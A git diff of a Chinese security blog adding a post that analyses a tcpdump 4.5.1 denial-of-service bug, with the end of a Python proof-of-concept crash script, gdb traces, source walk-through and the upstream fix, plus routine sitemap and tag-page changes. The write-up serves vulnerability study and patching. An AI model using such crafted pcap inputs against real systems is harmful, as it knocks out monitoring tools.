file.write(buffer) try: call(split(command)) print(&quot;Exploit successful! &quot;) except: print(&quot;Error: Something has gone wrong!&quot;)def main(): print(&quot;Author: David Silveiro &quot;) print(&quot; tcpdump version 4.5.1 Access Violation Crash &quot;) sleep(2) crash()if __name__ == &quot;__main__&quot;: main() 崩溃分析pcap包格式首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。123456789struct pcap_file_header &#123; bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */&#125;; 看一下各字段的含义：123456789101112131415161718192021 magic： 4字节 pcap文件标识 目前为“d4 c3 b2 a1” major： 2字节 主版本号 #define PCAP_VERSION_MAJOR 2 minor： 2字节 次版本号 #define PCAP_VERSION_MINOR 4 thiszone：4字节 时区修正 并未使用，目前全为0 sigfigs： 4字节 精确时间戳 并未使用，目前全为0 snaplen： 4字节 抓包最大长度 如果要抓全，设为0x0000ffff（65535）， tcpdump -s 0就是设置这个参数，缺省为68字节 linktype：4字节 链路类型 一般都是1：ethernetstruct pcap_pkthdr &#123; struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */&#125;;struct timeval &#123; long tv_sec; /* seconds (XXX should be time_t) */ suseconds_t tv_usec; /* and microseconds */&#125;; ts： 8字节 抓包时间 4字节表示秒数，4字节表示微秒数 caplen：4字节 保存下来的包长度（最多是snaplen，比如68字节） len： 4字节 数据包的真实长度，如果文件中保存的不是完整数据包，可能比caplen大 其中len变量是值得关注的，因为在crash文件中，对应len变量的值为00 3C 9C 37这是一个很大的值，读取出来就是379C3C00，数非常大，实际上在wireshark中打开这个crash文件，就会报错，会提示这个数据包的长度已经超过了范围，而换算出来的长度就是379C3C00，这是触发漏洞的关键。 gdb调试首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置1234567891011121314151617181920212223242526272829303132333435361. Program received signal SIGSEGV, Segmentation fault.2. [----------------------------------registers-----------------------------------]3. EAX: 0x14. EBX: 0x81e33bd --&gt; 0x05. ECX: 0x2e (&apos;.&apos;)6. EDX: 0x07. ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)8. EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)9. EBP: 0x1062110. ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])11. EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1])12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)13. [-------------------------------------code-------------------------------------]14. 0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;: je 0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;15. 0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;: mov ebx,DWORD PTR [esp+0x18]16. 0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;: sub esp,0x417. =&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1]18. 0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;: movzx ecx,BYTE PTR [ebx+ebp*2]19. 0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;: push edx20. 0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;: mov ebx,edx21. 0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;: mov DWORD PTR [esp+0x18],edx22. [------------------------------------stack-------------------------------------]23. 0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])24. 0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c25. 0008| 0xbfffe1b4 --&gt; 0x126. 0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)27. 0016| 0xbfffe1bc --&gt; 0x028. 0020| 0xbfffe1c0 --&gt; 0x029. 0024| 0xbfffe1c4 --&gt; 0x7ffffff930. 0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x031. [------------------------------------------------------------------------------]32. Legend: code, data, rodata, value33. Stopped reason: SIGSEGV34. hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,35. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:9136. 91 s2 = *cp++; 从崩溃信息来看，出错位置为s2 = cp++;崩溃原因为SIGSEGV，即进程执行了一段无效的内存引用或发生段错误。可以看到，问题出现在./print-ascii.c:91，而且此时指针读取[ebx+ebp2+0x1]的内容，可能是越界读取造成的崩溃。再结合源码信息可知，指针cp在自加的过程中访问到了一个没有权限访问的地址，因为这是写在一个while循环里，也就是是说nshorts的值偏大，再看nshorts怎么来的，由此nshorts = length / sizeof(u_short);可知，可能是函数传入的参数length没有控制大小导致，因此目标就是追踪length是如何传入的。我们通过bt回溯一下调用情况。123456789101112131. gdb-peda$ bt2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:914. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:1275. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:1806. #3 0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)7. at ./tcpdump.c:19508. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.89. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.810. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:156911. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,12. fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:29113. #8 0x0804c245 in _start () 函数调用流程1234pcap_loop |----print_packet |-----hex_and_ascii_print |-------- hex_and_ascii_print_with_offset 由此可见，从main函数开始了一连串函数调用，git源码下来看看。tcpdump.c找到pcap_loop调用12345678910111213141516171. do &#123;2. status = pcap_loop(pd, cnt, callback, pcap_userdata);3. if (WFileName == NULL) &#123;4. /*5. * We&apos;re printing packets. Flush the printed output,6. * so it doesn&apos;t get intermingled with error output.7. */8. if (status == -2) &#123;9. /*10. * We got interrupted, so perhaps we didn&apos;t11. * manage to finish a line we were printing.12. * Print an extra newline, just in case.13. */14. putchar(&apos;n&apos;);15. &#125;16. (void)fflush(stdout);17. &#125; 设置断点之后查看一下该函数的执行结果 pcap_loop通过callback指向print_packet,来看一下它的源码1234567891011121314151617181920212223241. static void2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)3. &#123;4. struct print_info *print_info;5. u_int hdrlen;6. ++packets_captured;7. ++infodelay;8. ts_print(&amp;h-&gt;ts);9. print_info = (struct print_info *)user;10. /*11. * Some printers want to check that they&apos;re not walking off the12. * end of the packet.13. * Rather than pass it all the way down, we set this global.14. */15. snapend = sp + h-&gt;caplen;16. if(print_info-&gt;ndo_type) &#123;17. hdrlen = (*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo, h, sp);&lt;====18. &#125; else &#123;19. hdrlen = (*print_info-&gt;p.printer)(h, sp);20. &#125;21. putchar(&apos;n&apos;);22. --infodelay;23. if (infoprint)24. info(0);&#125; 同样设置断点看该函数是如何调用执行的 这是我们可以根据call的信息，计算出调用的函数名 其中(*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo,h,sp)指向ieee802_15_4_if_print 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767725. u_int26. ieee802_15_4_if_print(struct netdissect_options *ndo,27. const struct pcap_pkthdr *h, const u_char *p)28. &#123;29. printf(&quot;address : %x\n&quot;,p);30. u_int caplen = h-&gt;caplen; //传入的caplen，赋值给无符号整形变量caplen,且该值为831. int hdrlen;32. u_int16_t fc;33. u_int8_t seq;34. if (caplen &lt; 3) &#123; //不满足35. ND_PRINT((ndo, &quot;[|802.15.4] %x&quot;, caplen));36. return caplen;37. &#125;38. fc = EXTRACT_LE_16BITS(p);39. hdrlen = extract_header_length(fc);40. seq = EXTRACT_LE_8BITS(p + 2);41. p += 3;42. caplen -= 3;//此时caplen = 543. ND_PRINT((ndo,&quot;IEEE 802.15.4 %s packet &quot;, ftypes[fc &amp; 0x7]));44. if (vflag)45. ND_PRINT((ndo,&quot;seq %02x &quot;, seq));46. if (hdrlen == -1) &#123;47. ND_PRINT((ndo,&quot;malformed! &quot;));48. return caplen;49. &#125;50. if (!vflag) &#123;51. p+= hdrlen;52. caplen -= hdrlen;53. &#125; else &#123;54. u_int16_t panid = 0;55. switch ((fc &gt;&gt; 10) &amp; 0x3) &#123;56. case 0x00:57. ND_PRINT((ndo,&quot;none &quot;));58. break;59. case 0x01:60. ND_PRINT((ndo,&quot;reserved destination addressing mode&quot;));61. return 0;62. case 0x02:63. panid = EXTRACT_LE_16BITS(p);64. p += 2;65. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));66. p += 2;67. break;68. case 0x03:69. panid = EXTRACT_LE_16BITS(p);70. p += 2;71. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p)));72. p += 8;73. break;74. &#125;75. ND_PRINT((ndo,&quot;&lt; &quot;);76. switch ((fc &gt;&gt; 14) &amp; 0x3) &#123;77. case 0x00:78. ND_PRINT((ndo,&quot;none &quot;));79. break;80. case 0x01:81. ND_PRINT((ndo,&quot;reserved source addressing mode&quot;));82. return 0;83. case 0x02:84. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;85. panid = EXTRACT_LE_16BITS(p);86. p += 2;87. &#125;88. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));89. p += 2;90. break;91. case 0x03:92. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;93. panid = EXTRACT_LE_16BITS(p);94. p += 2;95. &#125;96. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p))));97. p += 8;98. break;99. &#125;100. caplen -= hdrlen;101. &#125; 传入的第二个值是struct pcap_pkthdr *h结构体，函数使用的参数caplen就是结构体中的caplen，不难看出，caplen进行一些加减操作后，没有判断正负，直接丢给了下一个函数使用。直接跟进函数，看看最后赋值情况 从源码和调试信息可以看到libpcap在处理不正常包时不严谨，导致包的头长度hdrlen竟然大于捕获包长度caplen，并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数，导致caplen==0xfffffff3过长。继续跟进hex_and_asciii_print(ndo_default_print) 123456789101112131415161718192021222324252627282930311. void2. hex_and_ascii_print(register const char *ident, register const u_char *cp,3. register u_int length)4. &#123;5. hex_and_ascii_print_with_offset(ident, cp, length, 0);6. &#125;其中length==0xfffffff3，继续执行1. void2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,3. register u_int oset)4. &#123;5. register u_int i, s;6. register int nshorts;7.8. nshorts = (u_int) length / sizeof(u_short);9. i = 0;10. while (--nshorts &gt;= 0) &#123;11. if ((i++ % 8) == 0) &#123;12. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);13. oset += HEXDUMP_BYTES_PER_LINE;14. &#125;15. s = *cp++; &lt;======= 抛出错误位置16. (void)printf(&quot; %02x%02x&quot;, s, *cp++);17. &#125;18. if (length &amp; 1) &#123;19. if ((i % 8) == 0)20. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);21. (void)printf(&quot; %02x&quot;, *cp);22. &#125;nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=‭7FFFFFF9‬‬‬‬ 但数据包数据没有这么长，导致了crash。 内存分析仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。通过查看epx的值来看一下这个内存到底开辟到什么位置12341. gdb-peda$ x/10000000x 0x81e33bd2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x000000003. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x000000004. 0x8203ffd: Cannot access memory at address 0x8204000 可以看到，到达0x 8204000附近的时候，就是无法读取的无效地址了，那么初始值为0x 81e33bd，用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40，因为ebx+ebp*2+0x1一次读取两个字节，那么循环计数器就要除以2，最后结果为0x 10620。来看一下到达拒绝服务位置读取的长度：EBX: 0x81e33bd –&gt; 0x0；EBP: 0x10621；EBP刚好为10621。正是不可读取内存空间的地址，因此造成拒绝服务。 漏洞总结总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。 漏洞修补Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本在hex_and_ascii_print_with_offset中增加对caplength的判断1234567891. caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;2. if (length &gt; caplength)3. length = caplength;4. nshorts = length / sizeof(u_short);5. i = 0;6. hsp = hexstuff; asp = asciistuff;7. while (--nshorts &gt;= 0) &#123;8. ...9. &#125; 可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;，caplength为0，继续执行，可以推出length同样为0，到这里已经不会发生错误了。 参考exploit-db payloadWHEREISK0SHL分析博客libpcap/tcpdump源码]]></content>
+      <categories>
+        <category>二进制</category>
+      </categories>
+      <tags>
+        <tag>TCPDUMP</tag>
+        <tag>拒绝服务攻击</tag>
+      </tags>
+  </entry>
   <entry>
     <title><![CDATA[基于采集规则引擎的物联网设备发现方法]]></title>
     <url>%2F2018%2F12%2F23%2F%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87%2F</url>
diff --git a/sitemap.xml b/sitemap.xml
index 51bfe908..866415cc 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -1,6 +1,13 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   
+  <url>
+    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
+    
+    <lastmod>2019-07-01T09:28:40.813Z</lastmod>
+    
+  </url>
+  
   <url>
     <loc>https://cool-y.github.io/2019/07/01/AFL-first-learn/</loc>
     
@@ -51,14 +58,14 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/tags/index.html</loc>
+    <loc>https://cool-y.github.io/categories/index.html</loc>
     
     <lastmod>2019-04-15T07:35:38.085Z</lastmod>
     
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/categories/index.html</loc>
+    <loc>https://cool-y.github.io/tags/index.html</loc>
     
     <lastmod>2019-04-15T07:35:38.085Z</lastmod>
     
@@ -79,7 +86,7 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
+    <loc>https://cool-y.github.io/about/index.html</loc>
     
     <lastmod>2019-04-15T07:35:38.083Z</lastmod>
     
@@ -93,12 +100,19 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/about/index.html</loc>
+    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
     
     <lastmod>2019-04-15T07:35:38.083Z</lastmod>
     
   </url>
   
+  <url>
+    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
+    
+    <lastmod>2019-04-15T07:35:38.082Z</lastmod>
+    
+  </url>
+  
   <url>
     <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
     
@@ -114,21 +128,14 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
-    
-    <lastmod>2019-04-15T07:35:38.082Z</lastmod>
-    
-  </url>
-  
-  <url>
-    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
+    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
     
     <lastmod>2019-04-15T07:35:38.081Z</lastmod>
     
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
+    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
     
     <lastmod>2019-04-15T07:35:38.081Z</lastmod>
     
diff --git a/tags/CVE/index.html b/tags/CVE/index.html
index afa1a7de..b6e65011 100644
--- a/tags/CVE/index.html
+++ b/tags/CVE/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/MiniUPnP/index.html b/tags/MiniUPnP/index.html
index 1fa4ab0f..05dd7009 100644
--- a/tags/MiniUPnP/index.html
+++ b/tags/MiniUPnP/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/PE/index.html b/tags/PE/index.html
index 6293719e..0dd09091 100644
--- a/tags/PE/index.html
+++ b/tags/PE/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/QQ/index.html b/tags/QQ/index.html
index c10a732f..bdee62b3 100644
--- a/tags/QQ/index.html
+++ b/tags/QQ/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/SSH/index.html b/tags/SSH/index.html
index 81ad9196..ddcf167d 100644
--- a/tags/SSH/index.html
+++ b/tags/SSH/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/Samba/index.html b/tags/Samba/index.html
index c83d2fa1..8c3d88c3 100644
--- a/tags/Samba/index.html
+++ b/tags/Samba/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html
new file mode 100644
index 00000000..ba5fc925
--- /dev/null
+++ b/tags/TCPDUMP/index.html
@@ -0,0 +1,1125 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/tags/TCPDUMP/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/tags/TCPDUMP/">
+
+
+
+
+
+  <title>标签: TCPDUMP | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-bookmarks">
+          <a href="/bookmarks/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-map"></i> <br>
+            
+            书签
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block tag">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>TCPDUMP<small>标签</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
